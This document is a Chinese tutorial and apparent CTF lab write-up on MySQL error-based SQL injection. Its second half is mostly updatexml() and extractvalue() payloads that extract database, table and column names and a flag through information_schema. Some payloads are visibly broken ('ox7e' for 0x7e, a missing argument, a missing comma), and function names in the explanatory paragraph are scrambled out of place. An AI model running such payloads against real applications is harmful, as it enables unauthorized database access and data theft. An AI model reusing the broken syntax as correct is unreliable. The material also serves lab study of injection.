目录
报错注入概述
报错注入的原理
报错注入的步骤
报错注入的常用函数
实战案例
结论
方法1:updatexml函数
查看数据库名
查看表名
查看表中数据
方法2:extractvalue函数
查看数据库名
查看数据库中的表名
查看表中字段名
查看表中数据
报错注入概述
报错注入是一种SQL注入技术的变种,攻击者通过故意制造数据库错误来获取敏感信息。这种方法通常用于那些不允许正常错误信息回显的应用程序,攻击者利用数据库的错误处理机制,将希望得到的信息嵌入到可能导致错误的SQL语句中,从而使错误信息透露出所需的数据。
报错注入的原理
报错注入的关键在于利用某些函数在特定条件下产生的错误信息。例如,、、等函数在接收到不符合要求的参数时会返回错误信息,而这些错误信息中可能包含了攻击者需要的数据。updatexml()extractvalue()floor()
报错注入的步骤
- 判断是否存在报错注入:通过在输入参数中添加单/双引号,观察是否会引发错误信息来判断是否存在报错注入的可能。
- 确定报错注入的条件:进一步构造含有特定函数的SQL语句,观察报错信息是否包含有用信息。
- 提取数据库信息:通过精心设计的SQL语句,利用报错注入获取数据库的版本、库名、表名等信息。
报错注入的常用函数
- updatexml():用于修改XML文档中的节点值,当第二个参数不是有效XML时会产生错误。
- extractvalue():用于从XML文档中提取特定XPath表达式的值,当XPath表达式无效时会报错。
- floor():向下取整的数学函数,与结合使用时,可以在特定条件下产生错误rand()。
实战案例
在实际应用中,报错注入可用于获取数据库的版本、库名、表名等信息。例如,在SQLi Labs靶场中,攻击者可通过构造特定的报错注入语句来获取上述信息。
结论
报错注入是一种高级的SQL注入技术,它依赖于数据库的错误处理机制。了解和掌握报错注入的原理和技巧对于防御此类攻击至关重要。开发人员应确保应用程序的错误信息不被泄露,并对用户输入进行严格的验证和过滤,以防止报错注入的发生。
本关不是很麻烦,就使用SQL语句了,盲注的题就使用sqlmap工具了
方法1:updatexml函数
查看数据库名
1 union select updatexml(1,concat(ox7e,database(),ox7e),1);
查看表名
1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli'),0x7e)) --
查看表中数据
1 and updatexml(1,concat(0x7e,(select flag from flag),0x7e))--
发现flag不完整,使用mid函数跳过第一个字符c,提取剩下的全部字符
1 and updatexml(1,concat(0x7e,mid((select flag from flag),2),0x7e))--
方法2:extractvalue函数
查看数据库名
1 and extractvalue(null,concat(0x7e,(database()),0x7e))
查看数据库中的表名
1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli'),0x7e))--
查看表中字段名
1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e))--
查看表中数据
1 and extractvalue(1,concat(0x7e,mid((select flag from flag),2)0x7e))--